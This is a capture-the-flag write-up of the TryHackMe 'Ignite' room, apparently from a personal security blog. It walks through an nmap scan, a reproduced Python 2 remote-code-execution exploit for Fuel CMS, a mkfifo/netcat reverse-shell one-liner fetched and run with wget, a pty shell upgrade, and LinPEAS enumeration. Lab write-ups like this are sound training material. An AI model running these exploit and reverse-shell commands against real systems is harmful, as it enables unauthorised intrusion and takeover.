Vernilo hacks stuff
  • Home
  • 📦Hack The Box Write-ups
    • 📋Challenges
      • 🟢Reversing: Baby RE
      • 🟢Crypto: Templed
      • 🟢Crypto : Bank Heist
      • 🟢Web: emdee five for life
      • 🟠Web: Freelancer
    • 🖥️Machines
      • 🟢Spectra
      • 🟢Blunder
      • 🟢Cap
      • 🟢Knife
      • 🟠The Notebook
  • 🌧️Try Hack Me Write-ups
    • 🟢RootME
    • 🟢Pickle Rick
    • 🟢Ignite
    • 🟢Bounty Hacker
    • 🟠Dogcat
  • 📝Blog Posts
    • 🔗Understanding potential vulnerabilities in authentication mechanisms
Powered by GitBook
On this page
  • NMAP
  • Site
  • Exploiting
  • getting a reverse shell
  • getting a tty
  • User Flag
  • Privilege escalation
  • Privilege Escalation
  • ROOT flag

Was this helpful?

  1. Try Hack Me Write-ups

Ignite

PreviousPickle RickNextBounty Hacker

Last updated 3 years ago

Was this helpful?

Recognition

NMAP

nmap -sCV -A -O 10.10.226.192

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/fuel/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to FUEL CMS

Site

Visiting /fuel

we have a login page

So I searched about this system (fuel cms) on the exploitdb site and found this:

I will use the RCE Exploit because other else requires authentication and we don't have any credentials

the exploit be like


import requests
import urllib

url = raw_input('target (http://IP:PORT) : ')
def find_nth_overlapping(haystack, needle, n):
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start

while 1:
	xxxx = raw_input('cmd:')
	burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
	r = requests.get(burp0_url)

	html = ""
	htmlcharset = r.text.find(html)

	begin = r.text[0:20]
	dup = find_nth_overlapping(r.text,begin,2)

	print r.text[0:dup]

and it uses python2

Exploiting

getting a reverse shell

using the RCE we check that the machine has WGET command

so I will use this to download and run a reverse shell file

so I created a .sh file on my machine that contains it:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f

and to access the machine, I used a python server

nc -lvp PORT

python3 -m http.server 80

now I will download the file and run it in the box using RCE

wget IP/revshell.sh -O /tmp/revshell.sh; sh /tmp/revshell.sh

it works

getting a tty

checking if we have python

whereis python

we have python, so we will use it to get a tty

python -c 'import pty;pty.spawn("/bin/bash")'

User Flag

Privilege escalation

again using wget, we will use LinPeas to enumerate possible privilege escalation vectors

we will download on our machine, upload a server and then download in the box through our machine

in our machine:

python3 -m http.server 80

in the box

cd /tmp

wget <your_IP>/linpeas.sh

giving the permissions

chmod +x linpeas.sh

running

./linpeas.sh

Privilege Escalation

checking out this database

trying using this password

ROOT flag

that's it, thanks for reading

image

wget

🌧️
🟢
https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
Ignite
image
image
image
image
image